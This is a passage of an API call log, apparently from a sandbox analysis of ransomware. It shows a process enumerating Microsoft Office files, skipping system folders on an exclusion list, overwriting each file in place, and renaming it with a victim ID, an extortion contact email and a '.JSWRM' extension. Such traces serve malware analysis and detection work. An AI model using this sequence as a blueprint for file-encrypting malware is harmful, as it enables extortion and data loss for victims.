(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0122.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0122.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0122.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0122.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.705] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0122.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0122.706] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaf54f91, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaf54f91, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaf54f91, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x277, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINWORD_COL.HXC", cAlternateFileName="WINWOR~1.HXC")) returned 1 [0122.707] lstrcmpiW (lpString1="WINWORD_COL.HXC", lpString2=".") returned 1 [0122.707] lstrcmpiW (lpString1="WINWORD_COL.HXC", lpString2="..") returned 1 [0122.707] lstrcmpiW (lpString1="WINWORD_COL.HXC", lpString2="...") returned 1 [0122.707] lstrcmpiW (lpString1="WINWORD_COL.HXC", lpString2="windows") returned 1 [0122.707] lstrcmpiW (lpString1="WINWORD_COL.HXC", lpString2="recovery") returned 1 [0122.707] lstrcmpiW (lpString1="WINWORD_COL.HXC", lpString2="perflogs") returned 1 [0122.707] lstrcmpiW (lpString1="WINWORD_COL.HXC", lpString2="documents and settings") returned 1 [0122.707] lstrcmpiW (lpString1="WINWORD_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0122.707] lstrcmpiW (lpString1="WINWORD_COL.HXC", lpString2="system volume information") returned 1 [0122.707] lstrcmpiW (lpString1="WINWORD_COL.HXC", lpString2="msocache") returned 1 [0122.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0122.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_COL.HXC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_COL.HXC", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINWORD_COL.HXC", lpUsedDefaultChar=0x0) returned 15 [0122.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0122.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0122.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_COL.HXC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_COL.HXC", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINWORD_COL.HXC", lpUsedDefaultChar=0x0) returned 15 [0122.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0122.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0122.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0122.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0122.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.709] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=631) returned 1 [0122.709] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x270) returned 0x20b1f8 [0122.709] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x270, lpOverlapped=0x0) returned 1 [0122.712] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.712] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x270, lpOverlapped=0x0) returned 1 [0122.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0122.712] CloseHandle (hObject=0x238) returned 1 [0122.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0122.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0122.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0122.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0122.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0122.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0122.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.713] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0122.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0122.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0122.714] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaf2ed8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaf2ed8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaf2ed8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINWORD_COL.HXT", cAlternateFileName="WINWOR~1.HXT")) returned 1 [0122.714] lstrcmpiW (lpString1="WINWORD_COL.HXT", lpString2=".") returned 1 [0122.714] lstrcmpiW (lpString1="WINWORD_COL.HXT", lpString2="..") returned 1 [0122.714] lstrcmpiW (lpString1="WINWORD_COL.HXT", lpString2="...") returned 1 [0122.714] lstrcmpiW (lpString1="WINWORD_COL.HXT", lpString2="windows") returned 1 [0122.714] lstrcmpiW (lpString1="WINWORD_COL.HXT", lpString2="recovery") returned 1 [0122.714] lstrcmpiW (lpString1="WINWORD_COL.HXT", lpString2="perflogs") returned 1 [0122.714] lstrcmpiW (lpString1="WINWORD_COL.HXT", lpString2="documents and settings") returned 1 [0122.714] lstrcmpiW (lpString1="WINWORD_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0122.714] lstrcmpiW (lpString1="WINWORD_COL.HXT", lpString2="system volume information") returned 1 [0122.714] lstrcmpiW (lpString1="WINWORD_COL.HXT", lpString2="msocache") returned 1 [0122.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0122.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_COL.HXT", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_COL.HXT", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINWORD_COL.HXT", lpUsedDefaultChar=0x0) returned 15 [0122.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0122.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0122.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_COL.HXT", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_COL.HXT", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINWORD_COL.HXT", lpUsedDefaultChar=0x0) returned 15 [0122.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0122.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0122.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0122.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0122.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.715] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=207) returned 1 [0122.715] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0122.715] ReadFile (in: hFile=0x238, lpBuffer=0x24bce0, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24bce0*, lpNumberOfBytesRead=0x345e89c*=0xc0, lpOverlapped=0x0) returned 1 [0122.716] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.716] WriteFile (in: hFile=0x238, lpBuffer=0x24bce0*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24bce0*, lpNumberOfBytesWritten=0x345e898*=0xc0, lpOverlapped=0x0) returned 1 [0122.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0122.716] CloseHandle (hObject=0x238) returned 1 [0122.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0122.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0122.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0122.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0122.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0122.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0122.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.717] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0122.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0122.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0122.717] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaf2ed8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaf2ed8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaf2ed8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINWORD_F_COL.HXK", cAlternateFileName="WINWOR~2.HXK")) returned 1 [0122.718] lstrcmpiW (lpString1="WINWORD_F_COL.HXK", lpString2=".") returned 1 [0122.718] lstrcmpiW (lpString1="WINWORD_F_COL.HXK", lpString2="..") returned 1 [0122.718] lstrcmpiW (lpString1="WINWORD_F_COL.HXK", lpString2="...") returned 1 [0122.718] lstrcmpiW (lpString1="WINWORD_F_COL.HXK", lpString2="windows") returned 1 [0122.718] lstrcmpiW (lpString1="WINWORD_F_COL.HXK", lpString2="recovery") returned 1 [0122.718] lstrcmpiW (lpString1="WINWORD_F_COL.HXK", lpString2="perflogs") returned 1 [0122.718] lstrcmpiW (lpString1="WINWORD_F_COL.HXK", lpString2="documents and settings") returned 1 [0122.718] lstrcmpiW (lpString1="WINWORD_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0122.718] lstrcmpiW (lpString1="WINWORD_F_COL.HXK", lpString2="system volume information") returned 1 [0122.718] lstrcmpiW (lpString1="WINWORD_F_COL.HXK", lpString2="msocache") returned 1 [0122.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0122.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINWORD_F_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0122.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0122.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINWORD_F_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0122.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0122.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0122.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0122.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.719] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0122.719] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0122.719] ReadFile (in: hFile=0x238, lpBuffer=0x2094b8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2094b8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0122.720] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.720] WriteFile (in: hFile=0x238, lpBuffer=0x2094b8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2094b8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0122.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0122.720] CloseHandle (hObject=0x238) returned 1 [0122.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0122.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0122.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0122.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0122.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0122.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0122.721] HeapFree 